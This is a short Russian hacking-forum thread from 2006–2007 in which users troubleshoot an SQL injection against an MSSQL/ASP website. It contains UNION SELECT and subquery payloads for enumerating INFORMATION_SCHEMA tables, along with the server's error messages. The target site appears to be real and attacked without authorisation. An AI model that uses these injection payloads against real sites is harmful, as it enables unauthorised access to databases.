Форум АНТИЧАТ - Mssql. Ошибки синтаксиса

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Mssql. Ошибки синтаксиса (https://forum.antichat.xyz/showthread.php?t=14904)

gadjet

23.02.2006 11:06

Mssql. Ошибки синтаксиса

На сайте SQL инъекция (MSSQL). Подбираю столбцы, все вроде нормально. После запроса

http://.........asp?partId=5&infoId=...CHEMA.TABLES--

выдает:

Microsoft OLE DB Provider for ODBC Drivers ошибка '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'TOP'.

/_inc/engines/ssis/engine.asp, line 100

Как с этим бороться?

Rebz	23.02.2006 14:32

неверный синтаксис
union select TABLE_NAME from INFORMATION_SCHEMA.TABLES--
Читай статью
http://injection.rulezz.ru/MSSQL-ASP-Injection.html

gadjet

23.02.2006 16:37

Статью читал,

Цитата:

union select TABLE_NAME from INFORMATION_SCHEMA.TABLES--

на подобное он говорит что каждый запрос должен содержать одинаковое число колонок

halkfild

14.02.2007 04:57

вопрос еще почему при выполнении подзапроса
(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.T ABLES)
пишет ошибку
Incorrect syntax near the keyword 'top'.

все до вложеного правильно..

по моему те же грабли... как их убрать??

Время: 10:56